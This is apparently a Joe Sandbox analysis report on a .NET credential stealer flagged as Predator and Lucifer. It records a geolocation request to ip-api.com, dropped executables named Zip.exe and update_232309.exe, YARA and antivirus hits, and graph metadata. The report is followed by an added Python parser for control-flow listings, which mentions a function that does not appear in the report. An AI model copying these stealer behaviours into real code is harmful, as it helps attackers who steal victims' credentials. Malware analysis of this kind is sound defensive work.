Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}
Jan 23, 2023 21:25:37.391151905 CET | 115 | OUT | GET /json/ HTTP/1.1
Host: ip-api.com
Jan 23, 2023 21:25:37.425131083 CET | 115 | IN | HTTP/1.1 200 OK
Date: Mon, 23 Jan 2023 20:25:36 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 293
Access-Control-Allow-Origin: *
X-Ttl: 21
X-Rl: 37
Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 22 72 65 67 69 6f 6e 22 3a 22 5a 47 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 67 22 2c 22 63 69 74 79 22 3a 22 48 75 6e 65 6e 62 65 72 67 22 2c 22 7a 69 70 22 3a 22 36 33 33 33 22 2c 22 6c 61 74 22 3a 34 37 2e 31 37 33 2c 22 6c 6f 6e 22 3a 38 2e 34 32 30 34 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 2f 5a 75 72 69 63 68 22 2c 22 69 73 70 22 3a 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 6f 72 67 22 3a 22 44 45 54 20 41 66 72 69 63 61 20 28 50 74 79 29 20 4c 54 44 22 2c 22 61 73 22 3a 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 22 71 75 65 72 79 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 30 22 7d
Data Ascii: {"status":"success","country":"Switzerland","countryCode":"CH","region":"ZG","regionName":"Zug","city":"Hunenberg","zip":"6333","lat":47.173,"lon":8.4204,"timezone":"Europe/Zurich","isp":"Datacamp Limited","org":"DET Africa (Pty) LTD","as":"AS212238 Datacamp Limited","query":"102.129.143.10"}



                                                                                                                                        Target ID:0
                                                                                                                                        Start time:21:24:56
                                                                                                                                        Start date:23/01/2023
                                                                                                                                        Path:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Users\user\Desktop\5VXh2VBmA0.exe
                                                                                                                                        Imagebase:0x760000
                                                                                                                                        File size:549415 bytes
                                                                                                                                        MD5 hash:7A483865F3F1999AB24ED75F710649AD
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: 00000000.00000002.527402882.0000000002CA9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        • Rule: JoeSecurity_Predator, Description: Yara detected Predator, Source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: 00000000.00000000.255220986.0000000000762000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.527402882.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        Reputation:low

                                                                                                                                        Target ID:10
                                                                                                                                        Start time:21:25:19
                                                                                                                                        Start date:23/01/2023
                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\Zip.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\Zip.exe"
                                                                                                                                        Imagebase:0x176e4530000
                                                                                                                                        File size:32256 bytes
                                                                                                                                        MD5 hash:AF07E88EC22CC90CEBFDA29517F101B9
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: 0000000A.00000000.306320250.00000176E4532000.00000002.00000001.01000000.00000009.sdmp, Author: unknown
                                                                                                                                        • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\Zip.exe, Author: unknown
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                        • Detection: 77%, ReversingLabs
                                                                                                                                        Reputation:moderate

                                                                                                                                        Target ID:11
                                                                                                                                        Start time:21:25:20
                                                                                                                                        Start date:23/01/2023
                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\update_232309.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\update_232309.exe" / start
                                                                                                                                        Imagebase:0x980000
                                                                                                                                        File size:549415 bytes
                                                                                                                                        MD5 hash:7A483865F3F1999AB24ED75F710649AD
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_Predator, Description: Yara detected Predator, Source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Windows_Trojan_Lucifer_ce9d4cc8, Description: unknown, Source: 0000000B.00000002.380375902.0000000012E1D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                        Reputation:low

                                                                                                                                        Target ID:12
                                                                                                                                        Start time:21:25:29
                                                                                                                                        Start date:23/01/2023
                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\update_232309.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:"C:\Users\user\AppData\Local\Temp\update_232309.exe" / start
                                                                                                                                        Imagebase:0xa50000
                                                                                                                                        File size:549415 bytes
                                                                                                                                        MD5 hash:7A483865F3F1999AB24ED75F710649AD
                                                                                                                                        Has elevated privileges:false
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Reputation:low


                                                                                                                                          Execution Graph

                                                                                                                                          Execution Coverage:17.9%
                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                          Signature Coverage:0%
                                                                                                                                          Total number of Nodes:3
                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                          execution_graph 10916 7ffbad398c44 10918 7ffbad398c4d LoadLibraryW 10916->10918 10919 7ffbad398cfd 10918->10919

                                                                                                                                          Control-flow Graph

                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID: ^_I$7]_L
                                                                                                                                          • API String ID: 0-2983265569
                                                                                                                                          • Opcode ID: acab02144e35d1c8ef3b028d165dc78e345cf2be79db2ce5fd2238c9e8756a17
                                                                                                                                          • Instruction ID: 21cf9cd658b33cee569a6d6b6d9862ef4061207dc67d5687b51c0ca1e483eb64
                                                                                                                                          • Opcode Fuzzy Hash: acab02144e35d1c8ef3b028d165dc78e345cf2be79db2ce5fd2238c9e8756a17
                                                                                                                                          • Instruction Fuzzy Hash: 6632B571A19E194FEB69EB2CD8557BCB7D1EF5C350F0401BAD84ED3292EE24AC428781
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 1b890220073193897af1ce98e40498af03c4ab6d8278d18a7f22a9939fc3fa3f
                                                                                                                                          • Instruction ID: e46f37ad453e84438568145eb23b9c3e8044c904e6b0eff9405402df17c1cbb7
                                                                                                                                          • Opcode Fuzzy Hash: 1b890220073193897af1ce98e40498af03c4ab6d8278d18a7f22a9939fc3fa3f
                                                                                                                                          • Instruction Fuzzy Hash: 2F121961A1EE1A4FE759EB3CE4667BD77D1EF98710F14007AE84EC32D2ED18A8028351
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: f38c88ec243cbae714a538074f1636d4acfe6d3992ab62537bbb5c624c30e3a4
                                                                                                                                          • Instruction ID: 189934215ba2087937f7daa7ac58c3f6984d2afc82e83cd424fe0062bb5b2e10
                                                                                                                                          • Opcode Fuzzy Hash: f38c88ec243cbae714a538074f1636d4acfe6d3992ab62537bbb5c624c30e3a4
                                                                                                                                          • Instruction Fuzzy Hash: D60229A1E0DA5A5FE75A9638C46537DB7C1EF49324F14017DE88EC32D2EE2CA8438785
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                           • Function entry: 7ffbad3aa1a9; blocks span 7ffbad3aa1a9-7ffbad3aa82d (graph nodes 1301-1418)
                                                                                                                                           • Internal calls: 7ffbad3a5e28 (from blocks 1366 and 1372), 7ffbad3a5e68 (from block 1380)
                                                                                                                                           • Resolved APIs: none
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 0de1e29877df3d31ca27bb76131109c18a16ead311547a30adc4a57a40f7f832
                                                                                                                                          • Instruction ID: f896d548747ef1d13b2133b3416170d40ad9fbc7590f373173ad6a1d8b8c9004
                                                                                                                                          • Opcode Fuzzy Hash: 0de1e29877df3d31ca27bb76131109c18a16ead311547a30adc4a57a40f7f832
                                                                                                                                          • Instruction Fuzzy Hash: 1912A371A09A5E8FEB95EF68C8447E9B7E1FF58300F1041B9D40DD72A2DE39A981CB50
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                           • Function entry: 7ffbad3a2cf6; blocks span 7ffbad3a2cf6-7ffbad3a31b3 (graph nodes 1419-1480)
                                                                                                                                           • Internal calls: 7ffbad3a31b4 (from block 1471, 7ffbad3a3133-7ffbad3a3198)
                                                                                                                                           • Single-block loops (a block that branches to itself): 1433 (7ffbad3a2e08-7ffbad3a2e1b), 1442 (7ffbad3a2e9b-7ffbad3a2eae), 1456 (7ffbad3a2fb3-7ffbad3a2fc6), 1466 (7ffbad3a304e-7ffbad3a3061)
                                                                                                                                           • Resolved APIs: none
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 01147c1bdd63add26b0b81a619ff00e05c43e2baad3420d068b705d94df454ce
                                                                                                                                          • Instruction ID: 4f83b2d7c5604f97f24a7efc54145e9636b208a8d3110b8a663c7d5f8b540d5e
                                                                                                                                          • Opcode Fuzzy Hash: 01147c1bdd63add26b0b81a619ff00e05c43e2baad3420d068b705d94df454ce
                                                                                                                                          • Instruction Fuzzy Hash: 00F1D670609E4D8FEBA9DF28D845BE977D1FF58300F04826EE84DC72A1DB7599418B82
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                           • Function entry: 7ffbad3a3aa2; blocks span 7ffbad3a3aa2-7ffbad3a3f2f (graph nodes 1481-1540)
                                                                                                                                           • Internal calls: 7ffbad3a3f30 (from block 1532, 7ffbad3a3eb2-7ffbad3a3f14)
                                                                                                                                           • Single-block loops (a block that branches to itself): 1494 (7ffbad3a3bb8-7ffbad3a3bcb), 1504 (7ffbad3a3c4b-7ffbad3a3c5e), 1515 (7ffbad3a3ce0-7ffbad3a3cf3), 1524 (7ffbad3a3d80-7ffbad3a3d93)
                                                                                                                                           • Resolved APIs: none
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: 5492b39472fa6a29e9f4a0958f43c1cd47578820fd6be58283837d25f8cfb6d0
                                                                                                                                          • Instruction ID: 6fb4931731b46a89674b451257aca06082f58a35d05a8d1cbf23065a1f2ff89e
                                                                                                                                          • Opcode Fuzzy Hash: 5492b39472fa6a29e9f4a0958f43c1cd47578820fd6be58283837d25f8cfb6d0
                                                                                                                                          • Instruction Fuzzy Hash: ADE1E470A09A4D8FEBA9DF28C8557E977D1FF58310F00426ED84DC72A1DF75A9418B82
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                           • Function entry: 7ffbad398c44; blocks span 7ffbad398c44-7ffbad398d2a (graph nodes 838-846, seven blocks)
                                                                                                                                           • Resolved APIs: LoadLibraryW in block 843 (7ffbad398cc9-7ffbad398cfb), reached from the entry block 838 via block 839
                                                                                                                                           • Internal calls: none
                                                                                                                                           APIs
                                                                                                                                           • LoadLibraryW
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                          • Opcode ID: 7d03cf5b67a024ade708b7cd1c76e87bbcc99423d3c080e717ded338b6abec0b
                                                                                                                                          • Instruction ID: 89267c4f889c06fd38b5601eaa7b8994219cec8c354b40f7bc0cd19f56176377
                                                                                                                                          • Opcode Fuzzy Hash: 7d03cf5b67a024ade708b7cd1c76e87bbcc99423d3c080e717ded338b6abec0b
                                                                                                                                          • Instruction Fuzzy Hash: E631E47190DA4D8FDB59DF6CD849BE9BBE0EFA5320F04422BD009D3252DB74A806CB91
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%
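The lists the report labels `control_flow_graph` are a flat, whitespace-delimited export of each function's graph: a numbered basic block is `<id> <start>-<end>` (a single address when the block is one instruction long), optionally followed by `call <target>` for an internal call or by a resolved API name such as LoadLibraryW, and each `<src>-><dst>` token is an edge. The parser below is an added example and is not part of the Joe Sandbox report or of Joe Security's tooling; the grammar it assumes is inferred from the lists on this page, and the `Block`, `Cfg`, `parse_cfg`, `summarize` and `shortest_path_to_api` names are the example's own. `REPORT_CFG` is the 7ffbad398c44 function's list copied from this report.

```python
"""Parser for the raw control_flow_graph token lists behind a Joe Sandbox report.
Assumed grammar (inferred from the lists on this page):  <node_id> <start>[-<end>]
(call <target> | <ApiName>)*  declares a basic block;  <src>-><dst>  declares an edge."""
import re
from collections import deque
from dataclasses import dataclass, field

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
RANGE_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$", re.IGNORECASE)

# Copied verbatim from this report: the 7ffbad398c44 function that reaches LoadLibraryW.
REPORT_CFG = (
    "control_flow_graph 838 7ffbad398c44-7ffbad398c4b 839 7ffbad398c56-7ffbad398cbf "
    "838->839 840 7ffbad398c4d-7ffbad398c55 838->840 843 7ffbad398cc9-7ffbad398cfb "
    "LoadLibraryW 839->843 844 7ffbad398cc1-7ffbad398cc6 839->844 840->839 "
    "845 7ffbad398d03-7ffbad398d2a 843->845 846 7ffbad398cfd 843->846 844->843 846->845"
)

@dataclass
class Block:
    node_id: int
    start: int
    end: int
    calls: list = field(default_factory=list)  # internal call targets, as ints
    apis: list = field(default_factory=list)   # resolved API names seen in the block

@dataclass
class Cfg:
    blocks: dict = field(default_factory=dict)  # node_id -> Block, in listing order
    edges: list = field(default_factory=list)   # (src, dst) node ids
    entry: int = -1                             # first block listed is the function entry

def parse_cfg(text: str) -> Cfg:
    """State machine: the token after a node id is its address range, the token after
    `call` is the target, and any other bare token is a resolved API name."""
    cfg, current, i = Cfg(), None, 0
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    while i < len(tokens):
        tok = tokens[i]
        if (edge := EDGE_RE.match(tok)):
            cfg.edges.append((int(edge.group(1)), int(edge.group(2))))
        elif tok.isdigit():
            rng = RANGE_RE.match(tokens[i + 1]) if i + 1 < len(tokens) else None
            if rng is None:
                raise ValueError(f"node {tok} is not followed by an address range")
            start, end = int(rng.group(1), 16), int(rng.group(2) or rng.group(1), 16)
            current = cfg.blocks[int(tok)] = Block(int(tok), start, end)
            if cfg.entry < 0:
                cfg.entry = current.node_id
            i += 1
        elif tok == "call":
            if current is None or i + 1 >= len(tokens):
                raise ValueError("dangling call token")
            current.calls.append(int(tokens[i + 1], 16))
            i += 1
        elif current is None:
            raise ValueError(f"API name {tok!r} appears before any block")
        else:
            current.apis.append(tok)
        i += 1
    for src, dst in cfg.edges:  # an edge to an undeclared block would silently hide a path
        if src not in cfg.blocks or dst not in cfg.blocks:
            raise ValueError(f"edge {src}->{dst} references an undeclared block")
    return cfg

def shortest_path_to_api(cfg: Cfg, api: str):
    """BFS from the entry block to the first block invoking `api`; None if unreachable."""
    succ = {n: [] for n in cfg.blocks}
    for src, dst in cfg.edges:
        succ[src].append(dst)
    parent, queue = {cfg.entry: None}, deque([cfg.entry])
    while queue:
        node = queue.popleft()
        if api in cfg.blocks[node].apis:
            path = [node]
            while parent[node] is not None:
                node = parent[node]
                path.append(node)
            return path[::-1]
        for nxt in succ[node]:
            if nxt not in parent:
                parent[nxt] = node
                queue.append(nxt)
    return None

def summarize(cfg: Cfg) -> dict:
    """The per-function facts worth triaging: where it lives and what it invokes."""
    blocks = list(cfg.blocks.values())
    return {
        "entry": f"{cfg.blocks[cfg.entry].start:x}",
        "span": f"{min(b.start for b in blocks):x}-{max(b.end for b in blocks):x}",
        "blocks": len(blocks),
        "apis": sorted({a for b in blocks for a in b.apis}),
        "calls": sorted({f"{c:x}" for b in blocks for c in b.calls}),
        "self_loops": sorted(s for s, d in cfg.edges if s == d),
    }
```

`summarize` reduces a function to the facts an analyst triages on (entry, address span, internal call targets, resolved APIs, blocks that branch to themselves), and `shortest_path_to_api` answers the question the LoadLibraryW annotation raises: which branch from the entry leads to the import. Because the grammar is whitespace-delimited, lists that the report wraps across lines, including a `call` token separated from its target by a line break, parse unchanged. Run over the 7ffbad3941c0 function, the function's own entry address appears in its `calls` output, which is how the recursion there shows up.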

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.555600819.00007FFBAD26D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD26D000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad26d000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ef84d8fe6bf0a8cd0ed03219ea7bcf06735f1dacb6f0cf61ee66cf71e3383018
                                                                                                                                          • Instruction ID: 46e59702489a479975610c5b65bf00c8f58587df7951431b542272150d14984c
                                                                                                                                          • Opcode Fuzzy Hash: ef84d8fe6bf0a8cd0ed03219ea7bcf06735f1dacb6f0cf61ee66cf71e3383018
                                                                                                                                          • Instruction Fuzzy Hash: D441CF7140EBC44FDB5ADB38D8459523FF0EF5A220B1506DFE088CB1A7D625A85AC7A2
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000000.00000002.556434128.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_0_2_7ffbad390000_5VXh2VBmA0.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID:
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID:
                                                                                                                                          • Opcode ID: ddbb80692c5aa03b7ee308d4aba2049ac5552807e897391b0b2c7705fa776870
                                                                                                                                          • Instruction ID: 9f02716c1139f96d0daa7a05860f887889226a44d629e769435c68bb8702c572
                                                                                                                                          • Opcode Fuzzy Hash: ddbb80692c5aa03b7ee308d4aba2049ac5552807e897391b0b2c7705fa776870
                                                                                                                                          • Instruction Fuzzy Hash: 3041A36760A5BA85D602B63CBC852F9B750DF8633170003B7D3C8C90539E15AAFBCAE4
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Execution Graph

                                                                                                                                           Execution Coverage: 14.1%
                                                                                                                                           Dynamic/Decrypted Code Coverage: 100%
                                                                                                                                           Signature Coverage: 0%
                                                                                                                                           Total number of Nodes: 3
                                                                                                                                           Total number of Limit Nodes: 0
                                                                                                                                           Execution graph: 7ffbad399038 -> 7ffbad399041 (LoadLibraryW) -> 7ffbad39912d

Control-flow Graph (rendered graph omitted; the only API call in the graph is LoadLibraryW)

APIs
Memory Dump Source
• Source File: 0000000A.00000002.383866542.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffbad390000_Zip.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered graph omitted; the only API call in the graph is LoadLibraryW)

APIs
Memory Dump Source
• Source File: 0000000A.00000002.383866542.00007FFBAD390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD390000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffbad390000_Zip.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.382955394.00007FFBAD26D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD26D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ffbad26d000_Zip.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 15.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0
(Execution graph omitted; the only API call in the graph is LoadLibraryW.)

Control-flow Graph (rendered graph omitted; the only API call in the graph is LoadLibraryW)

APIs
Memory Dump Source
• Source File: 0000000B.00000002.391650782.00007FFBAD3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD3A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ffbad3a0000_update_232309.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000B.00000002.390975743.00007FFBAD27D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD27D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_7ffbad27d000_update_232309.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 14.7%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 3
Total number of Limit Nodes: 0
(Execution graph omitted; the only API call in the graph is LoadLibraryW.)

Control-flow Graph (rendered graph omitted; the only API call in the graph is LoadLibraryW)

APIs
Memory Dump Source
• Source File: 0000000C.00000002.403823791.00007FFBAD360000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD360000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffbad360000_update_232309.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.403287754.00007FFBAD23D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBAD23D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_7ffbad23d000_update_232309.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%